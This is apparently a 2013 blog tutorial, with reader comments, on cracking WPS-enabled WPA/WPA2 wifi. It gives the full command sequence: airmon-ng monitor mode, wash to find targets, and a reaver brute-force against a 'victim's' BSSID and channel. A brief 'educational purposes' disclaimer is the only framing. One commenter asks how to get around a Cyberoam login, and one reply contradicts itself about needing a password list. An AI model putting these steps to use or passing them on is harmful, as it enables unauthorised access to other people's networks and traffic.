Join Probux to get paid for clicking on links!!

Friday, August 9, 2013

Hacking a WPA/WPA2 network

Hacking a WPA/WPA2 network

 Caution:The contents below may be used only for educational purposes. If anyone uses it for illegal purposes, he/she may be responsible for its outcomes themselves.

Lets Get Started

          It doesn't require you to be an expert or a Computer Engineer to hack  a password protected wifi. Provided that you have patience and you are willing, anyone can. But it doesn't mean you to be a jerk and hack others' wifi. If you have been into programming (C,C++,Java,etc) you will find this a piece of cake. And those of you not familiar with programming, you need not worry cause I've described each and every steps briefly as much as possible. However, this hacking tutorial is effective only for WPS enabled networks.


First Things First

         In this Tutorial, I will be using Backtrack 5 for craking the wifi password. It is open-source and you can download your own copy from the link http://www.backtrack-linux.org/downloads/.
Backtrack 5 R3 is the latest version. But I'll be using Backtrack 5. Be sure to select GNOME in the Window Manager tab and make sure you download a .iso file. We will be using this file later to create a Live USB (or a Live Bootable DVD).
         You will also need a Wifi network adapter for this. The network adapter should be capable of packet injection. Packet injection means interfering with other networks by means of constructing packets to appear as if they are part of the normal communication stream. Packet injection allows us to intercept the packets from the other networks. But you may not need to know what it is in order to hack a wifi. All you need to know is if your network adapter is capable of injecting packets or not.
There is a list of Network Adapters that are compatible with Backtrack and capable of injecting packets. You may visit the following link:


          The good thing about Backtrack 5 R3 is that it has pre-installed tools "reaver" and "wash" which we will be using for craking WPA/WPA2. So if you don't have Backtrack, it is recommended to download Backtrack 5 R3 (you will not have to install reaver). If you have Backtrack 5,then you will need to download "reaver" and install it. I will discuss about it later.
           First you need to download Backtrack 5.


Backtrack Download Page1

 This is the preview of http://www.backtrack-linux.org/downloads/. You may or may not register for downloading your copy of Backtrack. If you wish to download without registering, just hit the "Download" button and proceed. If you wish to register, enter your details and hit "Register and Download" button.




           After you hit the download button, the above page will show up. Choose the Backtrack Version you wish to download. Backtrack 5 R3 is recommended as I mentioned earlier. However, I will be using Backtrack 5. There is not much difference between the two versions except that R3 version has extra pre-installed tools (reaver,wash,etc). Select the GNOME Window Manager. You may choose 32-bit or 64-bit architecture as you may desire. And be sure to select the ISO image type because we are going to boot backtrack in a live usb/dvd. There are other softwares like Virtual Box,VMWare Workstation that simulates a virtual machine. It means that you can boot any Operating System from your Windows. We can also boot a virtual Backtrack on VMWare Workstation but it shows network driver issues and can be a mess. But provided that you have a compatible Wifi Adapter, you may boot a virtual machine using Virtual Box or Vmware Workstation.

          After you have downloaded Backtrack 5, the next step is to create a live USB or live DVD for booting up Backtrack. First I'll be showing you how to create a live USB.

          For creating a Live USB you'll need a software Unetbootin. You may use any other software that can create a Live USB. I'll be using Unetbootin to create my Live USB. Click the link below to donwload Unetbootin.

Creating a Live USB

          After you download the file from the site, connect the USB thumb drive. Then double-click the file you just downloaded . In the Unetbootin window, select Backtrack Distribution as in the snapshot shown.




       Then, in the version tab, select the version 5R 1-GNOME


      Then, click on Diskimage, and browse to the Backtrack iso file you downloaded.

      
       Seclect the USB Drive of you thumb drive (pen-drive).


        Then, Click OK

        It will take around 10 mins for your Live USB to be ready. Be patient, it might take a while.

Creating a Live DVD

        For creating a live DVD, you will need ISO burning software. I will use Power ISO. You may use any other software. I'll be demonstrating for Power ISO. If you do not have this software, just google it and download it.
        All you need to do is burn the ISO file into a blank DVD. The ISO file is bootable itself so you need not bother about anything else. Insert a blank DVD into your DVD Drive. Then open up Power ISO. The snapshot of Power ISO window is shown below:


       Click on Open tab, and browse to your Backtrack iso file and open the iso file.

 

        After you've opened your iso file in Power ISO, just click on Burn.

         
        This will take around 10 to 15 mins depending on your DVD Drive. After the burning is over, your live DVD is ready. And you're all set for hacking.


Download Reaver

         This is only for those of you who will be using Backtrack 5. Those of you using Backtrack 5 R3 do not need to download it. There are several version of reaver. We will be using version 1.4. Click on the link below to donwload Reaver-1.4

         After downloading Reaver-1.4,  you will have a tar.gz file. Copy this file to one of your local drives in your Hard Disk other than your Windows Drive (i.e drive where your Windows is installed).


Now You're all set for hacking.


           Connect your Live USB or insert your Live DVD into your DVD slot. Then, restart your PC. Boot your PC from the Live USB or Live DVD (not your Hard Disk). For this, you'll have to bring up your Boot Options, which can be summoned by pressing button F8 or F10 or F12 (or any other Function key) depending on your PC. In the Boot Menu, select either USB Mass Storage if you're using Live USB or select your DVD drive if you're using Live DVD. Once you've booted correctly, a screen will pop up as in the snapshot below.


            Press Enter. As you press enter, it will start loading files and a menu will be shown on the screen. Just select the Default Boot Text Mode and hit enter.


            Then, wait till the welcome screen is shown. Type "  startx " and hit enter as in picture below.


             Now, you have booted your Live USB/DVD. Lets quickly move on and open a terminal. The location of Terminal tab is shown in the picture below.


             Once you've opened the terminal, type:      iwconfig



            This command lets you see all the interfaces available in your PC, including your wireless network interface. As in the snapshot, the wireless network interface name is wlan0 (Mostly it is wlan0, but it is dependent of network adapter.If a different name appears for your adapter, use that name). Interface name is wlan0 and its currently working in Normal Mode.

             Now type:      airmon-ng  and hit Enter.


         This command will show all of your wireless network interfaces. As in snapshot above its showing wlan0. Now lets put our network adapter into Monitor Mode.

           Type:        airmon-ng start wlan0


              This command will put your adapter in Monitor mode.(If your interface name is other than wlan0, type that name instead of wlan0 in above command) Now that your adapter is in Monitor mode, your interface name will now be changed to mon0. From here onwards, you will now use mon0 wherever you will have to put your interface name.

               Now type:          airodump-ng mon0


              Then press Enter:

             Airodump-ng will now monitor all the wireless networks available in your area. It gives detailed information about its BSSID, Encryption type, channel, etc. Hit Ctrl +C to stop searching for networks. But as I stated earlier, not all of these  networks can be hacked by Reaver. Reaver requires the network to be WPS enabled. So, we need to analyze which of the networks (Access Points) is WPS enabled. For that we use the "wash" tool. If you're using Backtrack 5 R3, you need not install anything. But for Backtrack 5, you'll need to install Reaver.

 Installing Reaver
               For installing Reaver, you'll need to copy the reaver-1.4.tar.gz file into the root folder. Go to Places at the top left corner, a drop-down box will appear. Click on the Drive where you saved your reaver-1.4.tar.gz file. Then, your local drive will be mounted in Backtrack and you can use the files in your hard drive. 

1.Copy and paste reaver-1.4.tar.gz into the folder "root" as shown in the picture below:


  
2. In the Terminal, type:        cd /

3. Type:    tar zxvf    and drag the reaver-1.4.tar.gz file into the terminal window like in picture   below:
  

4. Type:    cd reaver-1.4


5. Type:     cd src


6. Type:     ./configure

  7. Type:      make

 8. Type:        make install


        Once you enter the 8 commands, your reaver is now installed and ready to use.

 The Real Hacking Part

         Lets analyze the available networks that are WPS enabled. As I stated earlier, we shall use "wash" tool for this.

  In the Terminal, type:          wash -i mon0

        Now, as you can see in the above picture, wash shows you all the WPS enabled Network. Wait until your target network shows up. Once your target network shows up, hit Ctrl + C to stop searching for other Access Points. Note the bssid and the channel no. of your victim. We'll use this data to track the victim's Access Point.

           Now moving on to the final command, type:

reaver -i mon0 -b (victim's bssid) -c (channel no.) -vv

          Now, Reaver will associate with your victim's network and try the pins for hacking their Router. It takes around 4 to 10 hours to hack the network. The time required solely depends on the signal strength of the victim's wireless network. Just be patient and wait. Reaver will do the rest. Below is the snapshot what happens after you type the final command.

            It takes time, a lot of it. Be patient cuz at last its all worth it. It may show many warning like "Received TimeOut" , "WPS Transaction Failed" , etc. You just leave it on its own. Reaver will do its job. Many times you may end up trapped in a loop for the same pin. In that case, start again. And move nearer to the access point.


After a lot of waiting

 
      This is how it looks once you have successfully hacked the wireless network. Good Luck to you guys!!

       For hacking WPA/WPA2 for wireless networks which have WPS disabled, visit my post for hacking wpa/wpa2.
           For hacking a WEP encrypted wireless network visit my post hacking wep.

If you have any sort of problem, comment below. I'll try my best to solve your problem. Thanks!!


8 comments:

  1. Thanks for this blog.
    I have tried this process and it's great.
    Hacking is surely in our genes.....

    ReplyDelete
  2. I am gonna surely try this!!!!!
    n I did it for WEP ... Thank u!!

    ReplyDelete
  3. Does it require password list ?

    Can it be done on kali also ?

    Can you make a tutorial for FERN-WIFI CRACKER ?

    ReplyDelete
    Replies
    1. Fern-WIFI-Cracker looks like a great program. I am installing it now on my Gentoo Notebook. The only part I didn't like about getting into wifi was all the typing that I had to do on the bash shell. Looks pretty easy to use.

      Delete
    2. No, it does require a password list. Reaver uses a bruteforce attack, tries one pin after another, hacks the PIN of the WPS enabled Router. Then, it hacks the password. Yes, sure it can be done on kali-linux. Reaver and Wash comes all set for Kali Linux 1.3 . All the commands are the same for Kali linux too. Fern-Wifi Cracker is a great program, its quite easy to use. WEP can be easily hacked with Fern-Wifi Cracker, but hacking WPA with it requires a dictionary. And its not sure that WPA will be hacked with it. I may be making a tutorial on that soon.

      Delete
    3. Thanks and need a suggestion how to bypass cyberoam login forum so that without id surf ?

      Delete